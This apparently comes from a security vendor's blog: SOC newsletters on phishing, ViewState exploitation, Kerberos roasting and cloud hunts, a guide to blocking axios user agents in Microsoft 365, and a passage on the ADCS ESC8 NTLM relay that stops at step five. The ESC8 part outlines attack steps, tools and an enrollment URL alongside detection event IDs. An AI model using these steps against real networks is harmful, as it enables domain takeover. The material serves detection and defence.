Threat Actors Leveraging Phishing to Compromise User Mailbox and Abuse Inbox Rules

Detection: SecurityHQ’s SOC detected suspicious email activity associated with a user account, including abnormal inbox rule creation and unusual outbound email patterns, through Microsoft Defender for Office 365 alerts and message tracking log analysis.

Description: SOC identified a phishing incident where a user’s credentials were compromised after interacting with a malicious phishing email. Following successful account compromise, the threat actor authenticated to the user’s mailbox and created a malicious inbox rule that automatically forwarded incoming emails to an external RSS feed email address and marked those emails as read, effectively hiding attacker activity and exfiltrating sensitive communications.

Further investigation revealed that the compromised user account was subsequently used to send internal phishing emails to multiple employees within the organization, leveraging the trust associated with a legitimate internal sender. As a result, several additional user accounts were exposed and partially compromised before containment actions were initiated. Lead Incident Responder reviewed audit logs, inbox rule configurations, sign-in activity, and email telemetry to confirm the scope of compromise and identify affected users.

Immediate response actions included disabling the compromised account, resetting credentials, removing malicious inbox rules, revoking active sessions, and blocking the external forwarding destination. All affected users were notified, and suspicious internal phishing emails were removed from mailboxes using Defender remediation actions.

Lessons Learnt: User phishing remains a highly effective initial access vector for attackers. Inbox rule abuse is a common technique used to maintain persistence and evade detection. Rapid detection, user education, and automated remediation capabilities are critical to minimizing the blast radius of phishing-based compromises.

Threat Actors Exploiting weakness in ASP.NET viewstate deserialization to Remote Code Execution

Detection: Client reported possible malicious activity due to the presence of web shells on an IIS-hosted web server.

Description: The client reported the possible presence of a web shell on a web server. The team initiated an investigation using the available IIS server access logs and requested access to the client’s Microsoft Defender console. Based on log analysis, the team confirmed that the initial attack vector was an ASP.NET ViewState deserialization vulnerability. The team identified all malicious web shell payloads and the source IP addresses from which they were deployed. Immediate mitigation steps were recommended, including removing write permissions from the utilities folder. The team also provided all identified Indicators of Compromise (IOCs) to be blocked via the Defender console.

Recommendations: To strengthen the overall security posture, the team recommended applying the patch for the ViewState vulnerability. The team provided all available Indicators of Compromise (hashes) to be blocked in Microsoft Defender and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in Defender.

Lessons Learnt: Organizations should patch zero day critical vulnerabilitites immediately. IIS web servers hosting public applications are attractive targets for attackers. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

Threat Detection Engineering

Key Detection Engineering Highlights for December

A Global Penetration Testing Season Observed by SecurityHQ (Nov–Dec 2025)

As the year drew to a close, SecurityHQ’s global SOC entered one of its busiest periods. From November through December 2025, organizations across North America, EMEA, APAC, and LATAM scheduled year-end penetration testing and red team exercises to validate their security posture before the new fiscal year.

Early Reconnaissance: Mapping the Identity Landscape

In multiple customer environments, pentesters began quietly. Using LDAP queries, they enumerated Active Directory structures, probing for pre-authentication enabled accounts—a classic foothold for later abuse. SecurityHQ analysts noticed a surge in read-heavy directory queries, far exceeding normal user behavior baselines.

Soon after, the focus shifted to high-value groups. Enumerations of Domain Admins and Enterprise Admins were performed repeatedly, sometimes using native Windows tools, other times via popular AD enumeration frameworks. In mature environments, these queries triggered decoy account interactions, immediately flagging malicious intent.

Parallel to these activities, Pen testers conducted discovery scans, sweeping some known ports running windows services that can pave the way for lateral movement. In several cases, testers attempted DNS zone transfer requests, hoping to extract internal naming conventions and asset inventories.

Credential Access: Testing Human Weakness

The activity continued with password spray attacks. Pentesters tested commonly used passwords across large user populations, carefully staying below lockout thresholds.

SecurityHQ’s behavioral analytics detected the low-and-slow authentication failures and correlated them with earlier enumeration activity, forming a complete attack narrative.

Privilege Escalation Attempts: Ticket-Based Attacks

As reconnaissance matured, pentesters escalated to Kerberos abuse techniques.
SecurityHQ telemetry showed:

• Kerberoasting attempts, where service accounts with SPNs were targeted for offline password cracking.
• AS-REP Roasting, leveraging accounts with disabled pre-authentication to request encrypted authentication material.

These activities stood out due to abnormal Kerberos ticket request patterns.

Logical Phase	Pentester Activity	SecurityHQ Use Case Coverage
Network Discovery	Discovery scans for open services/ports	Covered
Network Discovery	Zone transfer request	Covered
Directory Recon	AD/DC enumeration using LDAP queries	Covered
Directory Recon	Excessive domain object queries	Covered
Directory Recon	Default Admin Group Enumeration	Covered
Target Identification	Identify pre-auth enabled accounts	Covered
Target Identification	Decoy account enumeration	Covered
Credential Access	AS-REP Roasting	Covered
Credential Access	Kerberoasting	Covered
Authentication Abuse	Password spray	Covered

LDAP AS-REP Roasting

Any of the AD account can be used suddenly to produce a burst of login events on the active directory. Mostly it is the the tool or a script that rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts. Credentials of the account are generally hard coded or embedded within the tool or script being used.

SecurityHQ’s Threat Detection team have developed logic that uses LDAP Active Directory Services event log file available under C:\Windows\System32\winevt\Logs

Rule Name: Authentication: Windows – Possible LDAP AS-REP Roasting

Detection Scope: Monitors LDAP and Kerberos authentication activity across Active Directory domain controllers.

Why it matters: Exposed Kerberos responses can be cracked offline, potentially leading to credential compromise without triggering repeated login failures. Early detection of this behavior helps identify credential access attempts before attackers escalate privileges or move laterally.

MITRE ATT&CK Mapping

TA0006 – Credential Access

T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights. 

Alert: Multiple Suspicious Script and Reconnaissance Activities Detected (INC #1460383)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telmetries on December 8th, 2025, indicating multiple suspicious activities. The alert covered abnormal script execution, potential persistence mechanisms, defense evasion techniques, and domain reconnaissance activity originating from a single internal endpoint. The activity was classified as suspicious due to the combination of tools and techniques commonly associated with malicious actor behavior.

Investigation: On December 8th, 2025, Microsoft Defender for Endpoint detected a sequence of suspicious actions initiated from a remote interactive session originating from an internal source IP. The activity involved the use of built-in Windows utilities and scripting engines that are commonly abused by threat actors. Notably, the NLTest utility was executed with the /domain_trusts parameter to enumerate domain trust relationships, a behavior indicative of Active Directory reconnaissance and often observed during ransomware operations or lateral movement preparation.

Shortly thereafter, additional suspicious behavior was identified, including the abuse of Rundll32 to execute JavaScript, a known living-off-the-land technique used to evade security controls, and wscript execution modifying registry keys related to proxy configuration, which could enable interception or redirection of web traffic. PowerShell was also observed as part of the activity chain, with the associated file hash reviewed through threat intelligence sources. The combination of script-based execution, system enumeration, and potential proxy manipulation strongly suggests intentional reconnaissance and defense evasion, rather than legitimate administrative activity.

Response Action taken:

• SOC Raised Major Incident and informed customer over call.
• Threat Management Team blocked identified IOCs and updated the incident.
• The malicious process was successfully blocked and terminated by Microsoft Defender.
• No further suspicious activity has been observed. Full antivirus scan has been performed across the entire host to ensure no residual malware components remain active

Alert: MDE: Pass the Hash followed by brute force was detected on Windows server. (INC #1471047)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telmetries on December 16th, 2025,, indicating suspicious lateral movement activity and remote command execution on device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address.

Investigation: On December 16th, 2025, security monitoring identified a successful network logon (Event ID 4624) using an anonymous authentication context over NTLM, originating from an internal source IP and targeting domain controller infrastructure. The authentication leveraged NTLM V1 with a key length of zero via the NtLmSsp logon process, which is highly anomalous and consistent with Pass-the-Hash–style activity. During the same timeframe, multiple indicators of credential abuse were observed, including failed NTLM authentication attempts for privileged accounts, enumeration of a large number of user accounts consistent with a dictionary-style attack, and repeated access attempts to administrative and IPC shares. Additional LDAP query activity against directory services further suggested reconnaissance behavior focused on domain discovery.

Subsequent investigation revealed a broader pattern of post-authentication activity, including the creation of new processes associated with agent-style executables, the addition of multiple network share objects, and repeated access to SYSVOL, NETLOGON, and IPC$ shares from the same source. Follow-on actions included the creation and password reset of new computer accounts within the domain, successful network logons tied to the same source IP, and directory read access across multiple domain controller shares, all indicative of lateral movement and persistence preparation. In parallel, sensitive recovery material was accessed via directory and cloud interfaces, increasing the overall risk severity. Taken together, the activity strongly aligns with credential misuse, lateral movement, and domain-level reconnaissance, rather than legitimate administrative operations.

Response Action taken:

• SOC Raised Major Incident and informed customer over call.
• Threat Management Team blocked identified IOCs and updated the incident.
• Running Malicious processes were terminated, Residues cleared by the Threat Management analyst.
• No further suspicious activity has been observed. Full antivirus scan has been performed across the entire host to ensure no residual malware components remain active.

Threat Hunting

SecurityHQ’ s Threat Hunting team conducted hunts focused in general email activities seen in the customer’s environment. Following section highlights some of the key findings and recommendations that were communicated to affected customers.

Context: Suspicious and abnormal email communication patterns were observed across the organizations, indicating a potential risk of data exfiltration, unauthorized information disclosure, or insider misuse. These behaviors include frequent communication with competitor domains, outbound emails sent outside business hours, attachments sent to free or personal email services, and anomalous email activity linked to departing employee accounts.

The objective of these hypotheses was to proactively detect, investigate, and respond to email-based data leakage risks, ensuring sensitive business information is not transferred outside the enterprise without authorization and strengthening the overall email security posture.

Notable Observations: Across the environment, the threat hunt identified multiple high-risk email behaviors. Key findings are summarized below: 

Extensive Communication with Competitor Domains

A significant volume of email communication was observed between internal users and competitor domains. List of competitor domains were shared proactively by few organisations with matured security program.

Key Observations:

• On an average 1-2 percent of total emails were identified involving competitor domains.
• Top competitor domains included key competitors for the company.
• Repeated high-frequency communications from a small subset of users. Subject lines referenced agreements, contracts, approvals, financial statements, tax and legal matters, increasing data sensitivity concerns.

Associated Risk: These patterns may indicate unauthorized sharing of confidential business information, competitive intelligence leakage, or misuse of corporate email channels. This highlights importance of adding competitor domains on watchlist to detect unapproved/intentional data leakage.

Out-of-Business Hours External Email Activity

Outbound emails sent between 7 PM and 7 AM showed elevated volumes toward external recipients.

Key Observations:

• Multiple users sent hundreds of emails to external recipients during non-business hours.
• Several emails were linked to payment-related or financial subjects.
• Activity occurred during low-visibility periods, reducing detection likelihood.

Associated Risks: Email activity during off-hours increases the risk of covert data exfiltration, especially when financial or sensitive business information is involved.

Email Activity from Departing / Disabled Accounts

Email activity was analyzed for users whose accounts were disabled in the last 30 days.

Key Observations:

• No clear evidence of malicious behavior immediately prior to account disablement were observed by SecurityHQ Team.
• From past experiences, Typically leavers tend to forward document as an email attachment to their personal email accounts.
• Associated Risk: Although not conclusively malicious, data leakage risk increases during employee offboarding, especially when legal or financial documents are involved.

Emails Sent to Free & Personal External Email Domains

Significant email traffic was observed toward free external email providers in organization where these domains are not explicitly blocked.

Key Observations:

• On average, 10 percent of total email trails involving free external domains.
• 70 percent of total emails sent, appeared to be sent to potential personal email accounts.
• All flagged emails included attachments.

Associated Risk: Sending attachments to personal email accounts is a well-known insider threat and data exfiltration technique, presenting one of the highest leakage risks identified in this hunt.

External Email Auto-Forwarding Indicators

While external auto-forwarding appears largely restricted, related behaviors were still noted.

Key Observations:

• No widespread misconfiguration allowing automatic forwarding was identified.
• Users were observed manually forwarding emails to external accounts.
• Lack of user awareness regarding the risks of external forwarding.

Associated Risk: Manual forwarding can bypass technical controls and enables silent, persistent data exfiltration if not properly monitored.

Hypothesis Status:

• The threat hunt identified multiple email communication behaviors that increase the risk of data exfiltration, although no confirmed malicious breach was detected.
• High-volume communication with competitor domains, combined with sensitive subject lines, represents a moderate to high data leakage risk.
• Out-of-business-hours emailing and attachment sharing to free or personal domains significantly elevates insider threat exposure.
• Departing employee accounts did not show over malicious intent but still warrant validation due to the nature of shared content.
• Overall, the findings highlight control gaps, monitoring blind spots, and awareness issues that could be exploited for unauthorized data disclosure if left unaddressed.

Recommendations: Based on the observed email threat landscape, the following actions are recommended

• Enforce DLP policies to detect and block sensitive financial, legal, and confidential content in outbound emails.
• Block or quarantine attachments sent to free and personal external email domains.
• Enable automatic encryption and mandatory classification for sensitive outbound email attachments.
• Monitor and alert on outbound emails sent to external recipients outside business hours.
• Trigger alerts when users send an unusually high number of attachments to new external recipients.
• Continuously monitor and review communications with competitor domains.
• Perform enhanced email activity reviews for users during employee offboarding periods.
• Restrict external email capabilities for departing users where business-justified.
• Educate users on risks associated with forwarding corporate emails to personal accounts.
• Periodically audit external email forwarding behaviors and policy exceptions.

Incident Response Success Story

Incident Story: X (Formerly Known as Twitter) Account Compromised Linked to corporate domain

SecurityHQ’s Incident Response (IR) team was engaged following a suspected account takeover involving Apple IDs, social media accounts, and mobile devices. The attack leveraged leaked personal data, phishing, and session hijacking techniques to bypass MFA and gain persistent access.

The incident began when an attacker obtained leaked personal data from an external breach. Using this information, the attacker crafted a highly targeted phishing email impersonating Apple security communications.

The phishing email prompted the victim to consent to Apple account access, unknowingly authorizing a malicious OAuth session. This allowed the attacker to bypass MFA via session hijacking.

With valid session access, the attacker logged in using the leaked credentials and began account persistence actions:

• Recovery email was changed on the X (Twitter) account
• Mobile number was updated on Telegram
• Deleted old tweets.

Investigation revealed that a single Session ID was accessed from multiple geographically disparate locations simultaneously. This anomaly provides definitive evidence of Session Hijacking, indicating that the attacker stole the valid session token and replayed it from a remote infrastructure to bypass Multi-Factor Authentication(MFA). 

The user’s personal Apple ID appeared in multiple breach datasets, and both personal and corporate accounts were active on the same device. This strongly supports a session hijacking pathway originating from the compromised personal account, enabling access to the corporate session without requiring the corporate password.

No direct evidence of corporate credential leakage was found on the dark web, and no further lateral movement was identified.

SecurityHQ Incident Response team shared tactical and strategical recommendation to prevent recurrence of similar incidents in future.

Authors:

The post Managed Defense Threat Insights: December 2025 Newsletter appeared first on SecurityHQ.

Threat Actor successfully probes PHP RCE payload towards website protected by AWS WAF & ALB

Detection: Incident driven security assessment led to detecting PHP RCE Probing Attempts on a Non-PHP Nginx Web Server disclosing and mitigating a critical security risk allowing bypass of defense layers.  

Description: While reviewing client’s security posture, SecurityHQ’s Incident Response team identified malicious traffic attempting to exploit a PHP Remote Code Execution (RCE) vulnerability against a web application hosted on Nginx, which does not run any PHP components. The attacker’s objective appeared to be reconnaissance — specifically, probing for server behavior and response codes. Because the affected webserver was not yet integrated with SIEM, initial 404 responses generated by Nginx were not visible to the Monitoring Team. A deeper investigation, combined with consultation with the application team, revealed that these 404 responses were originating from the web tier behind the AWS WAF and Application Load Balancer (ALB). 

Recommendations: To strengthen the overall security posture and reduce unnecessary traffic reaching the application backend, we recommended enabling all default AWS Managed Rule Groups within AWS WAF. These rule sets help block common exploit attempts—including PHP-based probes—at the edge, preventing them from being forwarded to the ALB and ultimately to the webserver. This proactive hardening step aligns with AWS best practices and significantly minimizes exposure to widespread vulnerability scanners and exploit attempts. 

Critical Vulnerability in Fortinet FortiWeb Exploited in the Wild

Detection: Critical FortiWeb Zero-Day Alert: Path Traversal Exploit Enables Remote Authentication Bypass

SHQ Detection Pack – Relevant Use Cases

1. Suspicious Web Requests Identified in Audit, System Logs
2. Administrative Logins to the management interface
3. Configuration Changes Executed

Description: SecurityHQ’s Incident Response team successfully responded to the incident involving CVE-2025-64446 – a critical vulnerability impacting Fortinet’s FortiWeb Web Application Firewall. The issue combines a relative path traversal flaw with an authentication bypass, allowing remote, unauthenticated attackers to access internal management endpoints. As per Vendor, Multiple FortiWeb versions are affected, including 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.9, 7.6.0–7.6.4, and 8.0.0–8.0.1, as confirmed by FortiGuard Labs and CISA. Exploitation requires no valid credentials. Attackers can send crafted HTTP(S) requests that leverage the pathtraversal weakness to reach protected CGI components on the management interface. Successful exploitation enables complete authentication bypass, allowing threat actors to create new administrative accounts and gain full control of the FortiWeb device. This poses a significant risk to environments relying on FortiWeb as a frontline security control.

Mitigation Actioned:

• Restricted Management Access to trusted internal
• networks only.
• Keys, Credentials and certificates were rotated.

Lessons Learnt: Organizations should have a strong proactive patching regime, restrict management access to internal networks, and enable key WAF protections to block exploitation attempts. Post-patch, review admin accounts and logs for unauthorized activity and ensure full SIEM visibility for ongoing monitoring.

Threat Detection Engineering

Key Detection Engineering Highlights for November

Azure Hound Probes

Threat Actors widely use Azure Hound or similar tools to map users, groups, and roles within Microsoft 365 or Entra ID as part of early enumerations. Often used by Red teamers to identify gaps in cloud security. Here is a short example of this Attack method: A lowprivilege account suddenly produces a burst of signins from an unusual application pattern.

The tool rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts.

Why it matters: This type of reconnaissance helps attackers understand your cloud environment, find weak points, and plan privilege escalation. Detecting these early signals reduces the chance of further compromise.

Rule Name: Azure Hound User Agent Detected (P2) Detection Scope: Microsoft 365 and Entra ID Rationale: Reconnaissance tools generate directory queries and sign-in patterns that differ from normal user activity. Identifying these anomalies allows early detection before attackers escalate privileges or move deeper into the environment.

BloodHound – Behavioral Detection:

An attacker runs a BloodHound/SharpHound collector from a compromised workstation to rapidly enumerate Active Directory. BloodHound enumeration creates rapid, large-scale directory queries that differ from normal user or admin behavior. Tracking abnormal spikes in object-access events helps identify reconnaissance before privilege escalation or lateral movement occurs.

Here is a short example of this Attack method: Host XYZ generated 2,400 “Failure Audit: An operation was performed on an object” events in 45 seconds, each referencing different AD objects (users/groups/ACLs). The source account was a low-privilege user (not a well-known service account) and the requests targeted many high-value OUs.

Why it matters: BloodHound-style enumeration reveals relationships, privileges, and ACEs that attackers use to plan lateral movement and privilege escalation.

Rule Name: Excessive Directory Access Failures Detected (P3)

Detection Scope: Monitor Windows Security audit logs for spikes in object-access events (success & failure) indicating mass AD enumeration; surface SourceHost, Username, and TargetObject; exclude known service/ admin accounts.

Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. Following section highlights some key security insights. 

Account Takeover! Sign-In Activity from malicious useragent “axios/1.13.1”

Detection: The incident trigger was a suspicious user authentication activity with unfamiliar sign-in properties and a detected password spray attack. The alert identified potential unauthorized access attempts originating from an unusual IP address and nonstandard client application.

Investigation: Identity Protection detected an unusual interactive sign-in for the user account originating from external IP address from USA location. The authentication was performed using the atypical user agent “axios/1.13.1”, a tool commonly used for automated HTTP requests rather than legitimate
browser-based logins.

Multiple aspects of the authentication including ASN, browser type, device fingerprint, geographic location, and Tenant IP subnet were all inconsistent with the user’s typical login patterns from users location and device, making the activity highly anomalous. Although MFA was successfully completed via text message to the registered number, the abnormal client and unfamiliar sign-in characteristics raised concerns regarding potential credential compromise or account
takeover.

Subsequent activity from the account included a suspicious URL click event leading to a OneDrive resource. Sandbox analysis confirmed the link redirected to a OneDrive login page, indicative of phishing intent. The URL originated from “cable[.]coromans[.]com”, a domain active since 2010 but potentially abused for malicious purposes. Additionally, a concurrent password spray detection targeting multiple accounts suggested broader credential-stuffing attempts in the environment. Based on these findings, the activity aligns with MITRE ATT&CK T1110 (Brute Force) under TA0001 – Initial Access, consistent with threat actors attempting unauthorized entry via automated or scripted authentication attempts. 

Actions taken: A major incident was raised, and the customer was notified over the phone. Immediate remediation steps were applied to the user’s account, and the identified IOC were blocked by SecurityHQ Team under Manager EDR Service 

Reference: https://www.securityhq.com/blog/adaptive-defense-how-cloud-app-policies-can-block-malicious-user-agents/

Throughout the year 2025, SecurityHQ Team Raised 300+ Major incidents originating from this axios UserAgent and were successful in preventing further damage in all cases.

Suspicious Remote Command Execution and Lateral Movement Activity.

Detection: An incident was escalated indicating suspicious lateral movement activity and remote command execution on device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address. 

Investigation: Microsoft Defender for Endpoint (MDE) detected suspicious WMI-related activity involving the legitimate WmiPrvSE.exe process executed with the unusual command line “-secured -Embedding.” Although WmiPrvSE.exe is commonly used by Windows, the behavior was flagged due to the associated detection of SuspRemoteCmdCommand, suggesting potential remote command execution.

Shortly afterward, a secondary process executed via cmd.exe, running quietly to capture the output of the whoami command to a temporary file—an action typically associated with attacker reconnaissance following lateral movement. The event also correlated with a prior Lateral Movement Detected alert on the same host, reinforcing concerns of unauthorized remote execution.

During behavior monitoring, threat was identified and terminated promptly. This active threat was classified as Behavior:Win32/SuspRemoteCmdCommand.SA operating within the WmiPrvSE.exe process.

Additional telemetry captured WUDFHost.exe activity near the same timeframe, indicating possible chained system operations triggered during the malicious sequence. Threat intelligence enrichment further validated risk indicators, as the external IP, and associated file hash were flagged by multiple security sources, supporting Defender’s classification of the activity as malicious.

Remediation Actions: The malicious process was successfully blocked and terminated by Microsoft Defender. No further suspicious activity was observed. All identified IOC’s wer blocked. Full antivirus scan was performed across the entire host to ensure no residual malware components remain active.

Not many security solutions are able to log command line activities. Having Enterprise EDR solution or command line auditing tool like Sysmon enables defenders and analyst to detect activities happening under the hood.

Threat Hunting

SecurityHQ’ s Threat Hunting team focused on hunting threats in cloud where Malicious or unauthorized activities occurring within the cloud environment mainly due to compromised credentials, misconfigured permissions, or exploitation of vulnerable services, leading to potential privilege escalation, lateral movement, and data exfiltration.

The objective of these hypotheses is to proactively detect, investigate, and respond to suspicious or unauthorized activities across cloud infrastructure that may indicate compromise, privilege escalation, data exfiltration, or other malicious behaviors — thereby reducing risk exposure and improving cloud security posture 

Notable Observations: Large-Scale Role Assumption & Privilege Probing: One of the customer environments showed an extremely high volume of AssumeRole operations, hinting at automation or scripted enumeration.

Key Observations:

• Unknown external IPs performing API calls with repeated access denials.
• Attempts to access sensitive resources or enumerate services.
• Occasional rate-throttling events tied to highvolume API activity, suggesting automation.

Associated Risk: Likely indicators of scripted scanning, misconfigured integrations, or malicious reconnaissance.

EC2 & Compute Irregularities: Most environments showed no compute-based compromise activity, but a
minority revealed abnormalities.

Key Observations:

• Large EC2 instances running unexpectedly.
• Rate-limiting and throttling events associated with compute services.

Associated Risks: No confirmed persistence, but compute resources are being probed or misused in some tenants.

Recommendations: Based on the combined threat landscape observed across all customers, the following global recommendations apply:

• Enforce Strong Authentication Immediately.
• Remove legacy IAM accounts where possible.
• Restrict console access by IP through IAM conditions or network controls.
• Harden IAM Roles & Reduce Privilege Exposure.
• Limit access to Secrets Manager and KMS to essential roles only.
• Lock Down S3 Storage by enabling Block Public Access globally.
• Conduct a Global Access Key Audit.

Incident Response – Success Story

Incident Story: ASP.NET Machine Key Exploitation

One of the Customer of SecurityHQ recently faced a critical web server compromise originating from a longstanding vulnerability in Microsoft’s ASP.NET framework. Threat actors have begun weaponizing publicly exposed ASP.NET machine keys — some of which have been available online since as early as 2003 — to hijack Internet Information Services (IIS) servers and deploy malicious modules.

IR Observations: Attack Narrative
During the investigation, it was discovered that threat actors exploited ASP.NET ViewState deserialization flaws. By obtaining publicly available machine keys, they could tamper with serialized ViewState data — a component used to maintain state information across web requests. Because these machine keys are cryptographic secrets that validate and secure ViewState content, possessing them effectively allowed the attackers to bypass ViewState MAC validation and execute arbitrary code on the targeted servers — all without requiring authentication credentials.

Microsoft had previously identified over 3,000 exposed machine keys across open repositories, forums, and developer sites, creating a wide landscape of potential victims. Many of these keys belonged to applications built on .NET Framework versions prior to 4.5, which lack built-in protection against deserialization abuse. 

Impact Analysis

Once the IIS servers were compromised, attackers loaded malicious IIS modules to maintain persistence and intercept incoming HTTP requests. These modules enabled:

• Command execution under IIS worker process privileges.
• Credential harvesting from memory and web traffic.
• Data exfiltration through legitimate web communications.
• Possible lateral movement within the network via trusted server accounts.

The stealth of this method made detection difficult, as all activities appeared as legitimate IIS traffic and
processes.

Root Cause

• Use of outdated ASP.NET versions (< 4.5) lacking secure ViewState handling.
• Disabled or weak MAC validation for ViewState integrity.
• Reuse or exposure of machine keys in public repositories and code-sharing platforms.

Conclusion

The exploitation of legacy ASP.NET vulnerabilities through leaked machine keys highlights the persistent risk posed by long-standing insecure configurations and public code exposure. By promptly rotating keys, enabling validation, and upgrading to modern frameworks with AMSI support, Organisation can restore the integrity of its web applications and prevent future exploitation of this vector.  

Reference: https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/

The post Managed Defense Threat Insights: November 2025 Newsletter appeared first on SecurityHQ.

Many organizations seek to block malicious user agents and prevent scripted or unauthorized programmatic access to Microsoft 365. Adversary-in-the-Middle (AiTM) attacks are on the rise, allowing attackers to intercept and forward authentication traffic in real time, even circumventing multi-factor authentication (MFA). A significant development is the adoption of malicious user agents, such as Axios, a JavaScript-based HTTP client, which attackers use to replicate browser activity and take over user sessions.

With these tools, attackers can:

• Automate the collection of credentials and replay of sessions
• Bypass basic browser fingerprinting techniques
• Launch large-scale attacks with minimal manual effort

Although detection strategies like monitoring user-agent strings or identifying unusual geolocation patterns are available, there is a lack of comprehensive guidance on countering these specific threats. Conventional security measures often fail to detect axios-driven requests that closely resemble genuine user actions.

As a result, organizations are exposed to risks including:

• Session hijacking, even when MFA is enabled
• Challenges in distinguishing automated agents from real users
• Ongoing unauthorized access after initial authentication

This blog underscores the urgent need to block malicious user agents through adaptive session policies and advanced behavior-based security in Microsoft 365

Prerequisites

Step-by-Step Configuration

Enable Microsoft Defender for Cloud Apps

Microsoft Defender for Cloud Apps (MDCA) is a security tool that provides visibility and control over user sessions in SaaS applications. It acts as a reverse proxy when Conditional Access routes a user’s traffic through it

1. Go to Microsoft 365 Defender Portal
2. Navigate to:
   Settings → Microsoft Defender for Cloud Apps → Connected Apps → Conditional Access App Control apps
3. Ensure Microsoft 365 apps are listed as below. If not, follow below 3.2 steps, to proceed to create conditional access policy for routing the requests to Cloud Apps

Create Conditional Access for Route Traffic to MDCA

Conditional Access App Control sends the session through the MDCA proxy where session inspection happens. This is the foundation for blocking based on the User-Agent string.

Go to Azure Portal → Microsoft Entra ID → Conditional Access

Click + New Policy

Configure the following settings:

Save and apply the policy.

Trigger MDCA Session Routing (App Detection)

After the CA policy is active, the user must log into the app (e.g., Outlook) to trigger MDCA to detect and begin monitoring the app.

1. Open a private/incognito browser window.
2. Visit Outlook or Teams.
3. Log in with a test account.
4. Wait 1–2 minutes.
5. Go to: Cloud Apps → Settings → Connected Apps → Conditional Access App Control apps
6. Confirm apps like Office 365, Teams, or Exchange appear as Monitored

Note: If not detected, recheck your Conditional Access policy and retry in incognito mode.

Create MDCA Session Policy to Block Axios

This policy inspects live sessions and blocks any that match certain criteria — in this case, when the User-Agent string contains “axios”.

1. In MDCA Portal → Control → Access policies → + Create policy

1. Configure the following settings:

Click Create

This will block any Axios-based request to Office 365 apps.

Blocking malicious user agents is just one layer of a broader adaptive defense strategy. As attackers evolve, organizations must go beyond detection and adopt real-time controls that secure sessions, user identities, and cloud interactions.

Learn how to take your security strategy further with SecurityHQ’s Adaptive Defense Solutions, built to identify, contain, and respond to threats at every stage of the attack lifecycle.

The post Adaptive Defense: How Cloud App Policies Can Block Malicious User Agents appeared first on SecurityHQ.

However, when misconfigured, ADCS can open doors for attackers to exploit weaknesses, leading to unauthorized access and privilege escalation.

How Can ADCS Become Vulnerable?

Unlike traditional threats, ADCS exploitation often begins with misconfigured certificate templates or weak HTTP-based enrollment methods. Once these are exploited, attackers can move laterally across the network, compromising critical systems and sensitive data.

Initially, the process begins with the client (user or computer) generating a public/private key pair. The client then sends a Certificate Signing Request (CSR) to the Certificate Authority (CA) server, which includes the public key and requested certificate details. The CA validates the request by checking if the certificate template settings permit the request, whether the certificate already exists, and if the client has the necessary permissions to enroll.

Figure 1: ADCS Client-to-Server Workflow, SecurityHQ

Upon successful validation, the CA uses its private key to sign and issue the certificate. The client stores the issued certificate in its Windows Certificate Store, enabling it to perform actions such as authentication, code signing, or secure communication as allowed by the certificate’s intended purpose.

Exploiting ESC8 – NTLM Relay Attack via AD CS Web Enrollment

Before exploring the exploitation of ESC8 (NTLM Relay Attack through AD CS Web Enrollment), it is important to understand how NTLM relay attacks work. NTLM relaying is a common attack used by threat actors to steal identities.

It works in two steps. First, it forces a victim to authenticate to a targeted endpoint. Second, it relays the authentication against a vulnerable target. By relaying the victim’s login details, attackers can log in and act as the victim. This helps them gain access to systems and potentially take over the network.

Figure 2: NTLM Relay Attack Flow, SecurityHQ

Active Directory Certificate Services (ADCS) provide an HTTP-based method for users and machines to enroll for certificates. When HTTP web enrollment is enabled, these methods are vulnerable and are often exploited through NTLM relay attacks. In such attacks, attackers impersonate authenticated users by relaying legitimate authentication requests to request certificates. This vulnerability can lead to full domain compromise.

The widespread use of HTTP-based enrollment further increases the risk of exploitation. Security researchers refer to this specific vulnerability or misconfiguration in ADCS as ADCS ESC8.

How Can ADCS ESC8 be Exploited in 6 Steps?

In this instance, the attacker first needs to enumerate the ADCS(HTTP) endpoint in the network which can be enumerated by tools such as certipy (python-based tool). Note that the attacker would need access to the domain, but the credential of a simple low-level authenticated user is all that is needed to perform the attack.

Figure 3: ESC8 (NTLM Relay Attack via ADCS Web Enrollment), SecurityHQ

1. Once the vulnerable endpoint (ADS01) is identified, actors use an NTLM coercion method to initiate NTLM authentication from a domain controller. Event Detection Point: Look for Windows Event ID 4776 where you will be able to see the login event performed for the domain controller account (i.e. DC01$) where $ indicates the authentication is initiated for the system account of DC from the victim’s machine.
2. The domain controller responds with the NTLM authentication which is relayed by the attacker from the victim’s machine to the vulnerable AD CS machine. This is achieved by setting up a relay on the attacker machine through tools such as ntlmrelayx.
3. The URL “http://<Vulnerable_CA_Server>/certsrv/certfnsh.asp” is Microsoft’s Certificate Services web interface, which is used for certificate enrollment. The “certfnsh.asp” page is responsible for completing the certificate request process and delivering the issued certificate to the requestor. Event Detection Point: Look for network traffic on port 80 directed toward the ADCS server. Specifically, you will observe a GET method here.
4. The attacker requests a certificate for a domain controller, as it was a relayed request impersonating a legitimate source, ADCS issues a certificate for the requested domain controller (i.e. DC01.pfx). This obtained certificate will be stored in the Windows stores. Event Detection Point: Look for Windows Event ID 4886, which is generated when certificates are requested, and Windows Event ID 4887, which indicates that Certificate Services has approved a certificate request and issued a certificate to the requester.
5. Using the generated certificate attackers can impersonate the domain controller machine account and request a Kerberos TGT to authenticate the Domain controller. Event Detection Point: Windows Event ID 4768 will show the Kerberos authentication login event for the domain controller account (e.g., DC01$) &. Look for network traffic on port 80 directed toward the ADCS server. Specifically, you will observe the POST method here.
